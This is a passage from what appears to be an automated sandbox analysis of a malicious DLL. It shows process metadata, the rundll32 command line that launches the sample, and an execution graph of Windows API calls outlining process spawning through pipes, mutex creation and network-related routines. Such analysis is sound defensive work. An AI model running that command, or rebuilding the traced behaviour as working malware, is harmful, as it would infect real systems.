                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:11
                Start time:10:49:07
                Start date:24/11/2022
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk
                Imagebase:0x7ff739200000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Reset < >

                  Execution Graph

                  Execution Coverage:5.9%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:25.1%
                  Total number of Nodes:1028
                  Total number of Limit Nodes:15
                  execution_graph 4503 1ff41c20000 4504 1ff41c20002 4503->4504 4506 1ff41c20017 4504->4506 4507 1ff41c201c1 4504->4507 4509 1ff41c203a5 4507->4509 4510 1ff41c237a7 4509->4510 4511 1ff41c237a9 4510->4511 4513 1ff41c237ae 4511->4513 4514 1ff41c23880 4511->4514 4513->4509 4515 1ff41c23882 4514->4515 4516 1ff41c2392e 4515->4516 4517 1ff41c23a5f RtlAllocateHeap 4515->4517 4516->4513 4518 1ff41c23c82 4517->4518 4518->4513 5395 180001844 5396 18000187a 5395->5396 5397 180001a6a 5395->5397 5396->5397 5398 180007b04 3 API calls 5396->5398 5399 18000188d 5398->5399 5399->5397 5400 180001899 GetTempPathW 5399->5400 5401 180001a55 5400->5401 5402 1800018b9 HeapAlloc 5400->5402 5403 180001a5a HeapFree 5401->5403 5402->5401 5404 1800018d5 GetTempPathW 5402->5404 5403->5397 5405 1800018e5 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 5404->5405 5406 180001916 HeapFree 5404->5406 5405->5406 5409 180001927 5405->5409 5406->5409 5407 180001938 StrChrW 5408 180001964 lstrlenW 5407->5408 5407->5409 5408->5409 5409->5401 5409->5407 5410 1800019ef 5409->5410 5412 180001a3c DeleteFileW HeapFree 5409->5412 5417 180009b7c lstrlenA lstrlenW lstrlenW HeapAlloc 5409->5417 5410->5412 5422 180003698 5410->5422 5412->5403 5418 180009bed wnsprintfW 5417->5418 5419 180009c2e 5417->5419 5437 180006754 memset 5418->5437 5419->5409 5448 180001000 CreateFileW 5422->5448 5425 1800036d7 HeapAlloc 5427 180003709 RtlOemStringToUnicodeString 5425->5427 5428 18000375a HeapFree 5425->5428 5426 180001a09 5426->5412 5433 180005bdc 5426->5433 5429 180003731 5427->5429 5430 180003727 RtlNtStatusToDosError 5427->5430 5428->5426 5458 180005a0c WideCharToMultiByte 5429->5458 5431 180003748 HeapFree 5430->5431 5431->5428 5434 180001a27 HeapFree 5433->5434 5435 180005c0b HeapAlloc 5433->5435 5434->5412 5435->5434 5436 180005c23 memcpy EnterCriticalSection LeaveCriticalSection 5435->5436 5436->5434 5438 1800089e4 3 API calls 5437->5438 5439 1800067b1 CreateProcessW 5438->5439 5440 180006801 WaitForMultipleObjects 5439->5440 5441 180006862 GetLastError 5439->5441 5442 18000684a CloseHandle CloseHandle 5440->5442 5443 180006830 5440->5443 5444 18000686a 5441->5444 5442->5444 5443->5442 5445 18000683f TerminateProcess 5443->5445 5446 18000687d HeapFree 5444->5446 5447 18000686f HeapFree 5444->5447 5445->5442 5446->5419 5447->5446 5449 1800010c8 GetLastError 5448->5449 5450 180001059 GetFileSize 5448->5450 5452 18000106a 5449->5452 5451 180001071 HeapAlloc 5450->5451 5450->5452 5451->5449 5455 180001088 ReadFile 5451->5455 5453 1800010d6 CloseHandle 5452->5453 5454 1800010df 5452->5454 5453->5454 5456 1800010f6 5454->5456 5457 1800010e8 HeapFree 5454->5457 5455->5449 5455->5452 5456->5425 5456->5426 5457->5456 5459 180005ad3 GetLastError 5458->5459 5460 180005a6a HeapAlloc 5458->5460 5461 180005aaa 5459->5461 5460->5461 5462 180005a80 WideCharToMultiByte 5460->5462 5461->5431 5462->5461 5463 180005ab4 GetLastError HeapFree 5462->5463 5463->5461 5578 180002f24 HeapAlloc 5579 180002f6e memset CreatePipe 5578->5579 5588 180002f66 5578->5588 5580 180002fcb CreatePipe 5579->5580 5581 180002fbe GetLastError 5579->5581 5580->5581 5582 180002fe5 5580->5582 5581->5588 5592 180001d98 memset 5582->5592 5585 18000459c SetLastError 5586 180003014 5585->5586 5587 18000303e GetLastError 5586->5587 5590 18000304a 5586->5590 5587->5588 5587->5590 5589 18000459c SetLastError 5589->5590 5590->5588 5590->5589 5591 180003089 GetLastError 5590->5591 5591->5588 5593 1800089e4 3 API calls 5592->5593 5594 180001e43 5593->5594 5595 180001ec6 5594->5595 5596 180001e4b memcpy CreateProcessW 5594->5596 5595->5585 5595->5588 5597 180001eb6 HeapFree 5596->5597 5598 180001eae GetLastError 5596->5598 5597->5595 5598->5597 5599 180009344 5600 18000938a 5599->5600 5601 1800094a7 5599->5601 5602 18000459c SetLastError 5600->5602 5603 180009398 5602->5603 5603->5601 5604 18000459c SetLastError 5603->5604 5605 1800093fb 5604->5605 5605->5601 5611 1800070fc memcpy 5605->5611 5607 18000459c SetLastError 5607->5601 5610 180009479 5610->5601 5610->5607 5612 180007189 5611->5612 5613 180007159 5611->5613 5629 18000417c 5612->5629 5613->5612 5615 18000716c memcpy 5613->5615 5615->5613 5616 1800071ee 5616->5601 5616->5610 5619 180007358 5616->5619 5617 18000719b 5617->5616 5635 180004748 5617->5635 5620 18000738b 5619->5620 5648 1800062d8 5620->5648 5623 1800073e3 5625 1800073d3 5623->5625 5626 180007b04 3 API calls 5623->5626 5624 1800073b4 GetModuleHandleA 5624->5625 5625->5610 5627 1800073f2 5626->5627 5627->5625 5628 180007404 HeapFree 5627->5628 5628->5625 5630 180004217 5629->5630 5633 1800041ac 5629->5633 5630->5617 5631 180004206 GetLastError 5631->5633 5632 18000459c SetLastError 5632->5633 5633->5630 5633->5631 5633->5632 5644 180003cc0 5633->5644 5636 18000459c SetLastError 5635->5636 5637 1800047a3 5636->5637 5638 18000490c GetLastError 5637->5638 5641 1800047c7 5637->5641 5639 18000490a 5638->5639 5639->5616 5640 18000459c SetLastError 5640->5641 5641->5639 5641->5640 5642 1800048d4 GetLastError 5641->5642 5643 180004875 GetLastError 5641->5643 5642->5641 5643->5641 5646 180003de7 5644->5646 5647 180003d04 5644->5647 5645 18000459c SetLastError 5645->5647 5646->5633 5647->5645 5647->5646 5649 180006309 5648->5649 5651 180006324 5648->5651 5649->5651 5652 180001624 5649->5652 5651->5623 5651->5624 5651->5625 5653 18000165e 5652->5653 5654 180001696 lstrlenA 5653->5654 5655 180001667 5653->5655 5654->5655 5655->5651 5702 180001b84 5703 180001bb8 5702->5703 5704 180001bce HeapFree 5703->5704 5705 180005600 7 API calls 5703->5705 5705->5704 5673 180008368 CreateEventA 5674 180008598 GetLastError 5673->5674 5675 1800083ae 5673->5675 5693 1800085a0 5674->5693 5676 18000459c SetLastError 5675->5676 5679 1800083c9 5676->5679 5677 1800085aa CloseHandle 5678 1800085b0 5677->5678 5679->5674 5680 1800083ea ResumeThread 5679->5680 5681 1800083f4 GetExitCodeProcess 5680->5681 5681->5674 5689 18000840b 5681->5689 5682 180008593 5682->5674 5682->5693 5683 18000841b PeekNamedPipe 5683->5674 5683->5689 5684 18000844c ReadFile 5684->5674 5684->5689 5686 1800084c6 WriteFile 5686->5674 5686->5689 5687 1800084ee WaitForMultipleObjects 5687->5689 5687->5693 5688 18000459c SetLastError 5688->5689 5689->5674 5689->5681 5689->5682 5689->5683 5689->5684 5689->5686 5689->5687 5689->5688 5690 18000854e WriteFile 5689->5690 5692 18000858b GetLastError 5689->5692 5689->5693 5694 180004258 5689->5694 5691 180008571 ResetEvent 5690->5691 5690->5692 5691->5681 5692->5682 5693->5677 5693->5678 5695 180004287 5694->5695 5696 18000459c SetLastError 5695->5696 5697 1800042fa 5695->5697 5696->5695 5697->5689 5377 1800025ec SleepEx 5378 180002609 5377->5378 5379 18000261b 5377->5379 5378->5379 5380 180002612 WaitForSingleObject 5378->5380 5380->5379 5464 180004c4c 5465 180004c6d EnterCriticalSection LeaveCriticalSection 5464->5465 5468 180002770 5465->5468 5469 180008308 SetLastError 5468->5469 5470 180002782 5469->5470 5471 180008308 SetLastError 5470->5471 5472 18000278a 5471->5472 5473 180002791 GetCurrentThreadId 5472->5473 5474 1800027b3 5472->5474 5475 1800027a9 CloseHandle 5473->5475 5476 18000279c WaitForSingleObject 5473->5476 5475->5474 5476->5475 5385 1ff41c21c6d 5387 1ff41c21c29 5385->5387 5386 1ff41c21c1e RtlAllocateHeap 5388 1ff41c21c14 5386->5388 5387->5386 5387->5388 5698 180007d6f 5699 180007d83 5698->5699 5700 180007d87 5699->5700 5701 180007d8c HeapFree 5699->5701 5701->5700 5519 180001110 5520 18000459c SetLastError 5519->5520 5521 18000113c 5520->5521 5522 180001175 5521->5522 5523 180001166 GetLastError 5521->5523 5523->5522 4519 180001334 4520 180001343 4519->4520 4521 180001357 4519->4521 4523 18000134f 4520->4523 4527 180004f1c HeapCreate 4520->4527 4538 180005578 4521->4538 4526 18000136a HeapDestroy 4526->4523 4528 180005069 4527->4528 4529 180004f5d 4527->4529 4528->4523 4530 180004ffc 4529->4530 4533 180004f8e HeapAlloc 4529->4533 4531 180005005 HeapDestroy 4530->4531 4532 180005010 HeapAlloc 4530->4532 4531->4528 4534 180005049 4532->4534 4535 180005039 HeapDestroy 4532->4535 4536 180004fb3 4533->4536 4547 18000508c HeapAlloc 4534->4547 4535->4528 4536->4530 4539 18000559a 4538->4539 4540 18000135e 4539->4540 4541 1800055b5 4539->4541 4542 1800055af SetEvent 4539->4542 4540->4523 4540->4526 4543 1800055bc Sleep 4541->4543 4544 1800055d0 4541->4544 4542->4541 4543->4543 4543->4544 4545 1800055d9 CloseHandle 4544->4545 4546 1800055df HeapFree 4544->4546 4545->4546 4546->4540 4548 180005419 4547->4548 4549 1800050e0 memset InitializeCriticalSection 4547->4549 4548->4528 4596 180008b44 GetModuleHandleA 4549->4596 4552 1800052f8 4554 180005578 4 API calls 4552->4554 4556 180005417 4554->4556 4556->4548 4559 18000515b HeapAlloc 4562 180005226 4559->4562 4563 18000518a RegOpenKeyW 4559->4563 4560 180005150 GetLastError 4561 180005408 4560->4561 4561->4548 4561->4552 4562->4552 4565 180005234 memcpy 4562->4565 4564 180005216 HeapFree 4563->4564 4573 1800051b2 4563->4573 4564->4562 4615 180005ca4 4565->4615 4566 1800051cf RegEnumKeyW 4568 1800051ee RegCloseKey 4566->4568 4566->4573 4568->4564 4568->4565 4572 18000529a 4572->4552 4631 180006dcc 4572->4631 4573->4566 4573->4568 4654 180009110 4573->4654 4574 180005ca4 6 API calls 4574->4572 4577 1800052e2 4577->4552 4641 180008708 4577->4641 4578 1800052b8 4658 180003c24 HeapAlloc 4578->4658 4582 180003c24 2 API calls 4583 1800052d7 4582->4583 4583->4577 4584 1800052f3 4584->4552 4585 180005361 4584->4585 4585->4552 4586 180005376 GetModuleHandleA 4585->4586 4587 180005393 4586->4587 4588 1800053fb 4586->4588 4589 18000459c SetLastError 4587->4589 4662 180002b60 4588->4662 4591 1800053a1 4589->4591 4592 1800053a9 GetCurrentThreadId 4591->4592 4593 1800053b9 4591->4593 4592->4593 4593->4560 4594 18000459c SetLastError 4593->4594 4595 1800053d8 4594->4595 4595->4548 4595->4560 4702 180007b94 4596->4702 4599 180008b81 GetModuleHandleA 4601 180007b94 3 API calls 4599->4601 4600 18000510d 4600->4552 4604 180007678 4600->4604 4602 180008b9d 4601->4602 4602->4600 4709 180002464 LoadLibraryA 4602->4709 4605 18000459c SetLastError 4604->4605 4606 1800076ae GetModuleHandleA 4605->4606 4608 1800076d5 4606->4608 4610 180005120 4606->4610 4609 18000459c SetLastError 4608->4609 4609->4610 4611 18000459c 4610->4611 4613 1800045b0 4611->4613 4612 1800045d3 SetLastError 4614 1800045de 4612->4614 4613->4612 4613->4614 4614->4559 4614->4560 4616 18000459c SetLastError 4615->4616 4617 180005cde 4616->4617 4618 180005ce5 CreateFileW 4617->4618 4619 180005d0b 4617->4619 4618->4619 4620 180005d18 RtlInitUnicodeString 4619->4620 4621 180005dcd GetLastError 4619->4621 4623 18000459c SetLastError 4620->4623 4622 18000527b 4621->4622 4622->4572 4622->4574 4624 180005d3c 4623->4624 4625 180005d41 NtQueryDirectoryFile 4624->4625 4626 180005d92 4624->4626 4625->4626 4628 18000459c SetLastError 4626->4628 4630 180005d9b 4626->4630 4627 180005dc2 CloseHandle 4627->4622 4629 180005db7 4628->4629 4629->4627 4629->4630 4630->4627 4716 1800089e4 4631->4716 4634 180006e21 lstrlenW 4636 180006e38 lstrcmpiW 4634->4636 4637 180006e4f 4634->4637 4635 1800052b1 4635->4577 4635->4578 4636->4637 4639 180006e7a HeapFree 4636->4639 4727 180002594 4637->4727 4639->4635 4642 180008759 4641->4642 4643 1800087f7 4642->4643 4737 1800030c8 4642->4737 4643->4584 4646 18000459c SetLastError 4647 1800087a9 4646->4647 4648 1800087ae CreateMutexW 4647->4648 4649 1800087c0 4647->4649 4648->4649 4650 1800087c8 GetLastError 4649->4650 4651 1800087e9 HeapFree 4649->4651 4652 1800087d5 FindCloseChangeNotification 4650->4652 4653 1800087e0 4650->4653 4651->4643 4652->4651 4653->4651 4655 18000914a 4654->4655 4657 1800091cd 4654->4657 4656 18000919e memcpy 4655->4656 4655->4657 4656->4657 4657->4573 4659 180003c66 4658->4659 4660 180003c9c 4658->4660 4661 180003c76 _snprintf 4659->4661 4660->4577 4660->4582 4661->4660 4661->4661 4663 180002464 6 API calls 4662->4663 4664 180002ba5 4663->4664 4665 180002bd9 4664->4665 4666 180002464 6 API calls 4664->4666 4667 180002f0d 4665->4667 4746 180008c60 HeapAlloc 4665->4746 4669 180002bbc 4666->4669 4667->4561 4669->4665 4670 180002bc2 HeapFree 4669->4670 4670->4665 4671 180002ed2 4672 180002ee5 HeapFree 4671->4672 4673 180002ef8 4671->4673 4672->4673 4673->4667 4674 180002f01 HeapFree 4673->4674 4674->4667 4675 180002beb 4675->4671 4676 180002ec8 4675->4676 4756 1800022ac memset 4675->4756 4835 180002620 4676->4835 4681 18000459c SetLastError 4683 180002cc6 4681->4683 4682 180002c8a 4682->4681 4683->4676 4684 180002370 2 API calls 4683->4684 4685 180002d20 4684->4685 4686 180002d41 4685->4686 4769 180002668 lstrlenA HeapAlloc 4685->4769 4688 180002370 2 API calls 4686->4688 4689 180002d5f 4688->4689 4690 180002370 2 API calls 4689->4690 4693 180002dad 4690->4693 4691 180002370 2 API calls 4692 180002dfa 4691->4692 4695 180002e16 GetSystemTimeAsFileTime 4692->4695 4696 180002e40 4692->4696 4693->4691 4695->4696 4698 18000459c SetLastError 4696->4698 4699 180002e9e 4696->4699 4778 180007dbc 4696->4778 4802 18000137c 4696->4802 4698->4696 4699->4676 4811 180007950 4699->4811 4703 180007d87 4702->4703 4704 180007beb 4702->4704 4703->4599 4703->4600 4704->4703 4705 180007bf9 RtlAllocateHeap 4704->4705 4705->4703 4706 180007c2a memset 4705->4706 4708 180007c69 4706->4708 4707 180007d8c HeapFree 4707->4703 4708->4703 4708->4707 4710 180002484 4709->4710 4711 1800024af GetLastError 4709->4711 4712 180007b94 3 API calls 4710->4712 4715 180002497 4711->4715 4713 180002491 4712->4713 4714 1800024a4 FreeLibrary 4713->4714 4713->4715 4714->4715 4715->4600 4717 180008a19 4716->4717 4718 180006e17 4717->4718 4719 18000459c SetLastError 4717->4719 4718->4634 4718->4635 4720 180008a38 4719->4720 4720->4718 4721 180008a51 HeapAlloc 4720->4721 4721->4718 4722 180008a6b 4721->4722 4723 18000459c SetLastError 4722->4723 4725 180008a79 4723->4725 4724 180008a9d HeapFree 4724->4718 4725->4724 4726 180008a91 4725->4726 4726->4718 4728 1800025b8 4727->4728 4733 1800072a4 4728->4733 4734 1800072df 4733->4734 4735 1800072f7 memcpy 4734->4735 4736 180007310 4734->4736 4735->4736 4738 180003117 4737->4738 4739 18000310a lstrlenW 4737->4739 4740 18000311a HeapAlloc 4738->4740 4739->4740 4741 18000319c 4740->4741 4742 180003134 4740->4742 4741->4643 4741->4646 4743 180003154 4742->4743 4744 18000313c memcpy 4742->4744 4745 18000315c memcpy 4743->4745 4744->4743 4745->4741 4745->4743 4747 180008cb9 memset 4746->4747 4749 180008d09 4746->4749 4748 180002464 6 API calls 4747->4748 4750 180008cde 4748->4750 4749->4675 4751 180008cfe 4750->4751 4752 180008ce4 HeapAlloc 4750->4752 4754 180002620 2 API calls 4751->4754 4752->4751 4753 180008d0b 4752->4753 4755 180008d3a InitializeCriticalSection 4753->4755 4754->4749 4755->4749 4838 180001c00 lstrlenA HeapAlloc 4756->4838 4759 180002348 4759->4676 4765 180002370 4759->4765 4760 180001c00 4 API calls 4761 18000230f 4760->4761 4761->4759 4762 180001c00 4 API calls 4761->4762 4763 18000232b 4762->4763 4763->4759 4841 180008d78 4763->4841 4766 180002385 4765->4766 4767 1800023a9 4766->4767 4875 1800094e0 4766->4875 4767->4682 4770 1800026c4 4769->4770 4771 180002749 4769->4771 4772 1800026e3 4770->4772 4773 1800026d4 lstrcpyA 4770->4773 4771->4686 4774 18000459c SetLastError 4772->4774 4773->4772 4775 1800026f9 4774->4775 4776 180002721 CloseHandle 4775->4776 4777 18000272c GetLastError HeapFree 4775->4777 4776->4771 4777->4771 4880 180001cb0 4778->4880 4783 180007fff 4784 180007f3a 4783->4784 4785 1800045e8 4 API calls 4783->4785 4787 180007f91 4784->4787 4788 180007f68 GetSystemTimeAsFileTime 4784->4788 4785->4784 4790 180007fba HeapFree 4787->4790 4791 180007fdc 4787->4791 4788->4787 4792 180007f78 4788->4792 4794 180007fcc 4790->4794 4791->4696 4792->4787 4935 1800045e8 4792->4935 4793 180007ed8 4798 180007eef 4793->4798 4916 1800023b8 4793->4916 4794->4791 4941 180008bc4 4794->4941 4798->4783 4922 1800099f4 4798->4922 4801 180007fef HeapFree 4801->4783 4803 180001605 4802->4803 4807 1800013b1 4802->4807 4803->4696 4804 180001531 memcpy 4804->4807 4805 180001593 HeapAlloc 4806 1800015aa memcpy 4805->4806 4805->4807 4808 1800015cb 4806->4808 4807->4803 4807->4804 4807->4805 5292 180005748 4808->5292 4812 180007959 4811->4812 4813 180002eba HeapFree 4811->4813 4814 180007a57 DeleteCriticalSection 4812->4814 4815 18000798d SetEvent 4812->4815 4813->4676 4814->4813 5371 180008308 4815->5371 4818 1800079a3 WaitForSingleObject CloseHandle 4819 1800079ba 4818->4819 4820 1800079c3 CloseHandle 4819->4820 4821 1800079c9 EnterCriticalSection 4819->4821 4820->4821 4822 1800079df 4821->4822 4823 1800079f0 LeaveCriticalSection 4822->4823 4824 180008308 SetLastError 4822->4824 4825 180007a09 4823->4825 4824->4822 4826 180007a01 Sleep 4825->4826 4827 180007a0e 4825->4827 4826->4825 4828 180007a15 Sleep 4827->4828 4829 180007a26 4827->4829 4828->4828 4828->4829 4830 180007a35 4829->4830 4831 180007a2f CloseHandle 4829->4831 4832 180007a44 4830->4832 4833 180007a3e CloseHandle 4830->4833 4831->4830 4832->4814 4834 180007a4c HeapFree 4832->4834 4833->4832 4834->4814 4836 180002641 HeapFree 4835->4836 4837 18000264c HeapFree 4835->4837 4836->4837 4839 180001c6d 4838->4839 4840 180001c4d memcpy memset 4838->4840 4839->4759 4839->4760 4840->4839 4842 180002370 2 API calls 4841->4842 4843 180008dc8 4842->4843 4844 1800090ee 4843->4844 4845 180008f3e HeapFree 4843->4845 4846 180008df9 lstrlenA HeapAlloc 4843->4846 4844->4759 4845->4844 4849 180008f85 4845->4849 4846->4845 4848 180008e20 memcpy 4846->4848 4850 180008e3c 4848->4850 4851 180002370 2 API calls 4849->4851 4852 180008e50 lstrlenA HeapAlloc 4850->4852 4864 180008e7b 4850->4864 4853 180008fa3 4851->4853 4852->4864 4853->4844 4857 180002370 2 API calls 4853->4857 4854 180008eda 4872 18000958c EnterCriticalSection 4854->4872 4855 180008f4f HeapFree 4855->4845 4859 180008ff3 4857->4859 4860 18000905e 4859->4860 4862 18000958c 2 API calls 4859->4862 4865 180002370 2 API calls 4860->4865 4866 180009018 memcpy 4862->4866 4863 180008f1d HeapFree HeapFree 4863->4845 4864->4854 4864->4855 4869 18000907d 4865->4869 4867 180009043 LeaveCriticalSection HeapFree 4866->4867 4868 18000902f memset 4866->4868 4867->4860 4868->4867 4869->4844 4870 18000958c 2 API calls 4869->4870 4871 1800090b2 GetSystemTimeAsFileTime LeaveCriticalSection 4870->4871 4871->4844 4873 1800095a2 Sleep 4872->4873 4874 180008eeb LeaveCriticalSection 4872->4874 4873->4873 4873->4874 4874->4845 4874->4863 4876 180009514 4875->4876 4879 180009550 4875->4879 4877 18000951c HeapAlloc 4876->4877 4876->4879 4878 180009534 memcpy 4877->4878 4877->4879 4878->4879 4879->4767 4881 180001cec EnterCriticalSection 4880->4881 4882 180001d7d 4880->4882 4883 180001d0c 4881->4883 4887 180008034 EnterCriticalSection LeaveCriticalSection HeapAlloc 4882->4887 4884 180001d74 LeaveCriticalSection 4883->4884 4885 180001d14 HeapAlloc 4883->4885 4884->4882 4886 180001d2a 4885->4886 4886->4884 4888 180007e3c 4887->4888 4889 1800080aa memset EnterCriticalSection 4887->4889 4888->4783 4892 18000970c 4888->4892 4890 180008111 LeaveCriticalSection 4889->4890 4891 1800080d5 4889->4891 4890->4888 4891->4890 4893 180009751 4892->4893 4894 180009758 EnterCriticalSection LeaveCriticalSection 4892->4894 4895 1800045e8 4 API calls 4893->4895 4896 1800097d1 4894->4896 4900 18000977f 4894->4900 4895->4894 4897 180007ec3 HeapFree 4896->4897 4946 180006108 HeapAlloc 4896->4946 4897->4793 4897->4798 4903 180001c00 4 API calls 4900->4903 4901 180009833 EnterCriticalSection LeaveCriticalSection 4904 180009866 4901->4904 4905 18000985f 4901->4905 4902 18000995c HeapFree 4902->4897 4903->4896 4907 180009882 lstrlenA lstrlenA 4904->4907 4908 18000993c HeapFree HeapFree 4904->4908 4906 180001c00 4 API calls 4905->4906 4906->4904 4909 180001c00 4 API calls 4907->4909 4908->4902 4910 1800098a7 4909->4910 4911 18000992e HeapFree 4910->4911 4912 1800098af memcpy 4910->4912 4911->4908 4958 1800088b4 4912->4958 4917 180002446 4916->4917 4920 1800023e6 4916->4920 4917->4798 4918 1800023eb EnterCriticalSection 4918->4920 4919 180002421 LeaveCriticalSection 4919->4920 4921 18000242f HeapFree 4919->4921 4920->4917 4920->4918 4920->4919 4921->4920 4923 180009a3e 4922->4923 4924 180007f30 4923->4924 4925 1800094e0 2 API calls 4923->4925 4924->4784 4924->4801 4926 180009a73 4925->4926 4926->4924 4927 180009aa4 4926->4927 5241 1800081f0 4926->5241 4929 180009b36 memset HeapFree 4927->4929 5246 180006eb0 4927->5246 4929->4924 4932 180009b16 4934 180009b1b memset HeapFree 4932->4934 4933 180009ae8 memcpy HeapFree 4933->4934 4934->4929 4936 18000958c 2 API calls 4935->4936 4937 18000460b 4936->4937 4938 180004616 GetSystemTimeAsFileTime 4937->4938 4939 18000462c LeaveCriticalSection 4937->4939 4938->4939 4939->4787 4942 180008be1 EnterCriticalSection 4941->4942 4943 180008c2e 4941->4943 4944 180008c14 LeaveCriticalSection 4942->4944 4943->4791 4944->4943 4947 180006163 4946->4947 4948 18000627d 4946->4948 4949 1800061ec 4947->4949 4969 180006008 lstrlenA HeapAlloc 4947->4969 4974 180006344 Sleep GetSystemTimeAsFileTime 4947->4974 4948->4901 4948->4902 4953 180006222 4949->4953 5005 180007444 GetSystemTimeAsFileTime _snprintf 4949->5005 4952 18000626f HeapFree 4952->4948 4953->4952 4954 180006240 HeapFree 4953->4954 4956 18000625a HeapFree 4953->4956 4954->4953 4956->4953 4959 1800088e9 4958->4959 4960 1800088ec memset 4958->4960 4959->4960 5112 180005448 4960->5112 4964 180008955 4968 180008965 4964->4968 5146 180003fcc 4964->5146 5162 180003e58 4968->5162 4970 180006069 _snprintf 4969->4970 4971 1800060e5 4969->4971 4970->4971 4972 1800060c7 lstrcpyA 4970->4972 4971->4947 4972->4971 4975 1800063a7 4974->4975 5016 1800066a8 4975->5016 4977 1800063d2 4978 1800063e3 lstrlenA lstrlenA HeapAlloc 4977->4978 4979 1800061b8 HeapFree 4977->4979 4980 180006671 HeapFree 4978->4980 4981 180006417 lstrcpyA 4978->4981 4979->4947 4979->4949 4980->4979 4982 180006456 4981->4982 4983 18000642f 4981->4983 5020 1800031d4 4982->5020 4983->4982 4985 180006434 lstrcatA lstrcatA 4983->4985 4985->4982 4987 180006663 HeapFree 4987->4980 4988 18000646e lstrlenA HeapAlloc 4989 1800064ad 4988->4989 4990 180006650 HeapFree 4988->4990 4992 1800066a8 3 API calls 4989->4992 4991 18000665e 4990->4991 4991->4987 4993 1800064e2 4992->4993 4994 180006642 HeapFree 4993->4994 4995 1800064f0 _snprintf HeapFree 4993->4995 4994->4990 4995->4991 4996 180006531 4995->4996 4996->4991 5037 180001208 4996->5037 4999 180006562 HeapAlloc 4999->4994 5000 180006589 4999->5000 5001 1800066a8 3 API calls 5000->5001 5002 1800065be 5001->5002 5003 180006634 HeapFree 5002->5003 5004 1800065c8 _snprintf _snprintf HeapFree 5002->5004 5003->4994 5004->4987 5006 1800074fc HeapAlloc 5005->5006 5010 1800074c8 5005->5010 5007 180007526 _snprintf HeapAlloc 5006->5007 5009 180007659 5006->5009 5008 18000764b HeapFree 5007->5008 5013 180007561 5007->5013 5008->5009 5009->4953 5010->5006 5011 1800074d7 lstrlenA 5010->5011 5011->5010 5012 180007603 _snprintf 5012->5009 5013->5012 5014 180007590 _snprintf memcpy memcpy 5013->5014 5014->5014 5015 1800075f9 5014->5015 5015->5012 5017 1800066e8 HeapAlloc 5016->5017 5018 1800066cf Sleep GetSystemTimeAsFileTime 5016->5018 5019 1800066ff 5017->5019 5018->5017 5019->4977 5048 180006a84 5020->5048 5023 180003391 5023->4987 5023->4988 5024 18000321e lstrlenA HeapAlloc 5025 180003383 HeapFree 5024->5025 5026 180003250 memcpy lstrcpyA lstrlenA 5024->5026 5025->5023 5027 180001208 14 API calls 5026->5027 5028 180003294 HeapFree 5027->5028 5028->5025 5029 1800032ac 5028->5029 5060 18000467c 5029->5060 5032 180003365 HeapFree HeapFree 5032->5025 5033 1800032f8 HeapAlloc 5034 180003324 UrlEscapeA 5033->5034 5035 180003341 5033->5035 5034->5035 5036 180003350 HeapFree 5034->5036 5035->5032 5036->5032 5038 180001249 5037->5038 5043 1800012d4 5037->5043 5039 180001252 EnterCriticalSection LeaveCriticalSection 5038->5039 5038->5043 5087 180009994 5039->5087 5042 180001292 HeapAlloc 5042->5043 5044 1800012aa 5042->5044 5043->4994 5043->4999 5045 180009994 10 API calls 5044->5045 5046 1800012ce 5045->5046 5046->5043 5047 1800012e8 HeapFree 5046->5047 5047->5043 5069 18000702c 5048->5069 5050 180006ac3 5051 1800066a8 3 API calls 5050->5051 5052 180006b20 5051->5052 5053 180003212 5052->5053 5054 1800066a8 3 API calls 5052->5054 5053->5023 5053->5024 5055 180006b34 5054->5055 5056 180006b3c HeapAlloc 5055->5056 5057 180006b7e HeapFree 5055->5057 5058 180006b54 5056->5058 5059 180006b70 HeapFree 5056->5059 5057->5053 5058->5059 5059->5057 5082 1800039a0 5060->5082 5063 1800046c5 HeapAlloc 5064 1800046e0 5063->5064 5068 1800032d0 5063->5068 5065 1800039a0 2 API calls 5064->5065 5066 1800046f3 5065->5066 5067 180004716 HeapFree 5066->5067 5066->5068 5067->5068 5068->5032 5068->5033 5070 18000459c SetLastError 5069->5070 5071 180007053 5070->5071 5072 18000707a 5071->5072 5073 1800070ce GetLastError 5071->5073 5074 18000459c SetLastError 5072->5074 5081 1800070be 5073->5081 5075 180007088 5074->5075 5078 1800070a4 5075->5078 5079 1800070a8 GetLastError 5075->5079 5076 180004cfc Sleep GetSystemTimeAsFileTime 5077 1800070e7 5076->5077 5077->5050 5080 18000459c SetLastError 5078->5080 5079->5078 5080->5081 5081->5076 5081->5077 5083 18000459c SetLastError 5082->5083 5084 1800039d9 5083->5084 5085 180003a05 5084->5085 5086 1800039fd GetLastError 5084->5086 5085->5063 5085->5068 5086->5085 5088 1800099a2 5087->5088 5089 18000128b 5088->5089 5091 180004a14 5088->5091 5089->5042 5089->5043 5092 18000459c SetLastError 5091->5092 5093 180004a54 5092->5093 5094 180004a7f 5093->5094 5095 180004c20 GetLastError 5093->5095 5096 180006d04 SetLastError memcpy memset GetLastError 5094->5096 5102 180004c10 5095->5102 5097 180004a9e 5096->5097 5098 180004aa8 memset 5097->5098 5111 180004bf6 5097->5111 5099 18000459c SetLastError 5098->5099 5101 180004aca 5099->5101 5100 18000459c SetLastError 5100->5102 5103 180004ae9 GetLastError 5101->5103 5106 180004af9 5101->5106 5102->5089 5103->5106 5103->5111 5104 180004afd memcpy 5104->5106 5105 18000459c SetLastError 5105->5106 5106->5104 5106->5105 5107 180004bd6 GetLastError 5106->5107 5108 180004bb0 memcpy 5106->5108 5109 180004bde 5107->5109 5108->5106 5108->5109 5110 18000459c SetLastError 5109->5110 5110->5111 5111->5100 5113 180005496 5112->5113 5114 180005486 5112->5114 5118 18000549a 5113->5118 5189 1800027d4 5113->5189 5178 180004dd0 lstrlenA HeapAlloc 5114->5178 5118->4964 5118->4968 5126 180005df8 5118->5126 5119 1800054e2 5119->5118 5121 18000459c SetLastError 5119->5121 5122 180005511 5121->5122 5221 180003798 5122->5221 5125 180005545 HeapFree 5125->5118 5127 180005e31 5126->5127 5128 180005fad 5126->5128 5129 18000459c SetLastError 5127->5129 5128->4964 5130 180005e47 5129->5130 5131 180005fb4 GetLastError 5130->5131 5132 18000459c SetLastError 5130->5132 5131->5128 